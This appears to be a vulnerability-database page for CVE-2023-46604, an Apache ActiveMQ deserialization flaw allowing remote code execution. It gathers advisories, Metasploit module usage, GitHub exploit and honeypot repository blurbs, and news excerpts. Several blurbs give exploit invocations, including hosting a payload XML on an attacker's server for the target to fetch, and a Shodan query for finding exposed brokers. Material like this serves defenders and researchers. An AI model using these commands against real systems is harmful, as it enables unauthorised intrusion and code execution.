CVE-2023-46604

CVSSv4: NA | CVSSv3: 9.8 | CVSSv2: NA | VMScore: 1000 | EPSS: 0.94301 | KEV: Exploitation Reported
Published: 27/10/2023 Updated: 21/11/2024

Vulnerability Summary

This vulnerability allows remote malicious users to execute arbitrary code on affected installations of Delta Electronics InfraSuite Device Master. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Apache ActiveMQ broker, which listens on TCP port 61616 by default. The issue results from the use of a vulnerable version of Apache ActiveMQ. An attacker can leverage this vulnerability to execute code in the context of the service account.

Vulnerable Product

apache activemq

apache activemq legacy openwire module

debian debian linux 10.0

netapp e-series santricity unified manager -

netapp e-series santricity web services proxy -

netapp santricity storage plugin -

Vendor Advisories

Synopsis Critical: Red Hat Fuse 7121 release and security update Type/Severity Security Advisory: Critical Topic A minor version update (from 712 to 7121) is now available for Red Hat Fuse The purpose of this text-only errata is to inform you about the security issues fixed in this releaseRed Hat Product Security has rated this update ...
Debian Bug report logs - #1054909 activemq: CVE-2023-46604 Package: activemq; Maintainer for activemq is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Source for activemq is src:activemq (PTS, buildd, popcon) Reported by: Moritz Mühlenhoff <jmm@inutilorg> Date: Sat, 28 Oct 2023 14:27:04 UT ...
Check Point Reference: CPAI-2023-1080 Date Published: 5 Nov 2023 Severity: Critical ...
Hitachi Ops Center Administrator contains the following vulnerabilities: CVE-2023-45648, CVE-2023-46589, CVE-2023-46604 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
Multiple vulnerabilities have been found in Hitachi Command Suite CVE-2015-7559, CVE-2018-11775, CVE-2019-0222, CVE-2023-46604 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
Properties Threat Severity High ...

Exploits

This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16 ...
This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16 ...

Mailing Lists

Dear subscribers, We're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities Feel free to join our bug bounty programs for OX App Suite, Dovecot and PowerDNS at YesWeHack This advisory has also been published at documentationopen-xchangecom/appsuite/security/adv ...

Metasploit Modules

Apache ActiveMQ Unauthenticated Remote Code Execution

This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

msf > use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
msf exploit(apache_activemq_rce_cve_2023_46604) > show targets
    ...targets...
msf exploit(apache_activemq_rce_cve_2023_46604) > set TARGET <target-id>
msf exploit(apache_activemq_rce_cve_2023_46604) > show options
    ...show and set options...
msf exploit(apache_activemq_rce_cve_2023_46604) > exploit

Github Repositories

This repository has a tool and an API for Saudi CERT alerts. Its goal is to help improve the level of cybersecurity awareness in Saudi Arabia. Using AWS Lambda, this project takes Saudi CERT's alerts, organizes them, and makes them easy to get through a public API.

Saudi Cert Lambda (Parser & Public API) 🚀 Revised Goal This repository features a specialized tool and API for Saudi CERT alerts, focusing on bolstering online safety in Saudi Arabia Utilizing AWS Lambda, it efficiently gathers and organizes Saudi CERT's alerts, providing easy access through a public API In its pursuit, the project prioritizes offering the la

configs for my GitHub Account

Socials GitHub Stats 👷 Check out what I'm currently working on mranv/redrs - This repository is dedicated to providing effective and efficient tools for security professionals and penetration testers who want to perform security assessments and intrusion tests mranv/solitude - Solitude offers shell scripts for managing isolation

This script leverages CVE-2023-46604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.

CVE-2023-46604 RCE Pseudoshell This script leverages CVE-2023-46604 (Apache ActiveMQ) to generate a pseudo shell The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol This flaw can be exploited by an att

CVE-2023-46604 This repository contains an exploit script and a Proof of Concept (PoC) XML file for the CVE-2023-46604 vulnerability affecting Apache ActiveMQ The vulnerability allows for remote code execution due to unsafe deserialization practices within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's

Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604

CVE-2023-46604 Lab This lab guides on exploiting vulnerabilities of CVE-2023-46604 Acknowledgements Apache ActiveMQ CVE-2023-46604 Environment This lab requires the installation of 2 virtual machines One Kali Linux machine version 20234 and one Ubuntu machine version 22043 LTS You can download them here: Kali Linux 20234 Ubuntu 22043 LTS VMware-workstation-1750 for

ActiveMQ honeypot

activemq-honeypot Honeypot that scopes CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP addresses, Post-Exploitation samples and malware samples This information can be helpful to detect and prevent attacks in future Real usage exampl

Repository to exploit CVE-2023-46604 reported for ActiveMQ

Active MQ CVE-2023-46604 exploit This repository is a guide with examples on how to exploit the CVE-2023-46604 The exploit takes advantage of the usage of reflection for instantiating Exception classes through a malicious command that instead of being a valid command, it sends as the exception class a Spring class to load beans and as the string constructor parameter an URL fro

Cy8 - AI-Powered Vulnerability Advisory Generation Cy8 is an innovative project that combines the power of AI with modern technologies like OpenAI, RAG (Retrieval-Augmented Generation), and langChain to simplify and accelerate the process of generating vulnerability reports Designed for security professionals, Cy8 aims to reduce the time and effort spent on researching and doc

ActiveMQ RCE (CVE-2023-46604) exploitation tool with command output echo

ActiveMQ-Exploit English | Simplified Chinese CVE-2023-46604 ActiveMQ RCE < 5183 Exploit Supports running jdk 18 and the target version automatically determines whether it is within the scope of the vulnerability Supports echo mode and built-in generation of expxml fofa query Disclaimer This tool is only used for legal testing Please make sure you are authorized for th

ActiveMQ CVE-2023-46604 port 61616 exploitation tool Safe versions >= 5183/5176/5167 java -jar ActiveMQExpjar rhost=rhost lhost=lhost gadget=gadget cmd=cmd For example java -jar ActiveMQExpjar rhost=127001 lhost=127001 gadget=cb19 cmd=whoami Defaults rport=61616 ldapport=1389 httpport=9998 Currently supported gadgets are as follows gadget=wincmd cmd=whoami // no echo gadget=linuxcmd c

Outbound-Connection-OpenWire-Case-Cyberdefender An outbound connection was observed from the server's public IP to a public IP flagged as a bad IP That bad IP was indeed used by a threat actor to exploit a vulnerability on the server's activemq service, CVE-2023-46604 From the analysis carried out by the SOC team, 2 bad IPs were found,

PY

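ActiveMQ_CVE-2023-46604 Python implementation that quickly constructs the data traffic and sends the packet; both gadget classes are implemented, orgspringframeworkcontextsupportFileSystemXmlApplicationContext and orgspringframeworkcontextsupportClassPathXmlApplicationContext; FIleSystemXml can bypass some IDS-type detection devices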

In each folder, you will find a detailed explanation for exploiting the following CVE vulnerabilities: CVE 2015-5254, CVE 2016-3088, CVE 2022-41678 and CVE 2023-46604 In each folder, you will find detailed instructions for scanning the network, identifying the running ActiveMQ version, and exploiting the vuln

A go-exploit for Apache ActiveMQ CVE-2023-46604

Apache ActiveMQ CVE-2023-46604 CVE-2023-46604 is a widely exploited vulnerability that appears on CISA's KEV list This go-exploit implementation can execute a reverse shell on the targets using a Nashorn payload, or download a binary to the target and execute it Compiling To build the exploit into a docker image simply: make docker

CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool

⚙️ Tool overview (Welcome star 🌟) CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool 🔧 Usage # Fetch the source git clone githubcom/sule01u/CVE-2023-46604git # Enter the directory cd CVE-2023-46604 # Deploy pocxml to an HTTP service (Deploy on your vps) python3 -m httpserver # Send the poc python

Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ This exploit builds upon the foundational work available at githubcom/X1cT34m (githubcom/X1r0z/ActiveMQ-RCE) We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (githubcom/rapid7/metasploit-framework) Usage: Important: Manually change the IP Address (0

CVE-2023-46604-RCE Vulnerability A deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16 Setup Change the Values inside the POCXML as your needs (Your Command) Host the POCXML pass the POCXML URL to th

broker

CVE-2023-46604 RCE Pseudoshell This script leverages CVE-2023-46604 (Apache ActiveMQ) to generate a pseudo shell The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol Description CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol This flaw can be exploited by an att

ExploitScript-CVE-2023-46604 Disclaimer This repository contains proof-of-concept code for CVE-2023-46604 and is intended strictly for educational purposes The authors and contributors do not endorse any illegal activity The information presented here is for academic, security research, and testing purposes, and for the current resolution of the machine Broker from HackTheBo

Exploit for CVE-2023-46604

CVE-2023-46604 Exploit for CVE-2023-46604 This tool helps to exploit this vulnerability Shodan Query to find target: product:"ActiveMQ" port:"61616" Tools Usage: for read targets from the file: python3 exploitpy -f targets -c YourVPS/pocxml --- single target: python3 exploitpy -ip IP -c YourVPS/pocxm

POC repo for CVE-2023-46604

CVE-2023-46604-POC POC repo for CVE-2023-46604

The script exploits an insecure deserialization vulnerability in Apache ActiveMQ (CVE-2023-46604)

Technical Summary of the Attack: CVE-2023-46604 The script exploits an insecure deserialization vulnerability in Apache ActiveMQ (CVE-2023-46604) to achieve remote code execution on the target server Description of the Exploitation Process Target of the Vulnerability: The vulnerability resides in the OpenWire protocol of

ActiveMQ RCE (CVE-2023-46604) exploitation tool

ActiveMQ-RCE [English Version] ActiveMQ RCE (CVE-2023-46604) exploitation tool, based on the Go language Some detailed analysis reports exp10itio/2023/10/apache-activemq-版本-5183-rce-分析 attackerkbcom/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis OpenWire protocol analysis A simple analysis of the OpenWire protocol, with reference to the official documentation and Wireshark activemq

A modular, dockerized pentesting environment

Dock-n-Pwn Lab Overview The Dock-n-Pwn lab is a Dockerized penetration testing environment that provides an attack machine (Parrot Security OS) and several vulnerable targets for practicing offensive security techniques The lab includes core services such as Juice Shop, WebGoat, DVWA, and Metasploitable2, along with an integrated Vulhub directory containing additional vulnerab

CVE-2023-46604

CVE-2023-46604 CVE-2023-46604

Socials GitHub Stats 👷 Check out what I'm currently working on gainfisheries/solitude - Solitude offers shell scripts for managing isolation settings on macOS and Linux Enhance firewall control and system security effortlessly gainfisheries/blogs - all my blogs goes here! gainfisheries/gainfisheriesgithubio - This repository, g

activemq-rce-cve-2023-46604

README simple analysis for CVE-2023-46604 thinkycxme/2024-04-19-activemq-cve-2023-46604-analysishtml

CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.

honeypotrs Honeypot that scopes CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP addresses, Post-Exploitation samples and malware samples This information can be helpful to detect and prevent attacks in future How it works? In real c

CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker

Broker_ApacheMQ CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker

jereanny14

jereanny14githubio Digital-security-in-company´s About this project is about the cybersecurity in company´s, how cyberattacks be a problem a how we can avoid them Just as the subtitle says, we will cover these topics, like hacking examples in Costa Rica, general problems for safe datas and the use about software or malware The objectives about this project is make

Recent Articles

Critical Apache ActiveMQ flaw under attack by 'clumsy' ransomware crims
The Register

Over a week later and barely any patches for the 10/10 vulnerability have been applied

Security researchers have confirmed that ransomware criminals are capitalizing on a maximum-severity vulnerability in Apache ActiveMQ. Announced on October 25 and tracked as CVE-2023-46604, the insecure deserialization vulnerability allows for remote code execution (RCE) on affected versions. "Apache ActiveMQ is vulnerable to remote code execution," Apache said in its advisory. "The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manip...

Oracle emits 603 patches, names one it wants you to worry about soon
The Register

Old flaws that keep causing trouble haunt Big Red

Oracle has delivered its regular quarterly collection of patches: 603 in total, 318 for its own products, and another 285 for Linux code it ships. Big Red’s VP of security assurance Eric Maurice singled out one patch as worthy of particular attention: The fix addresses CVE-2025-21556, a CVSS 9.9-out-of-10-rated vulnerability in Oracle’s Agile Product Lifecycle Management (PLM) Framework which allows a low-privileged attacker with network access to compromise that tool, and through it other O...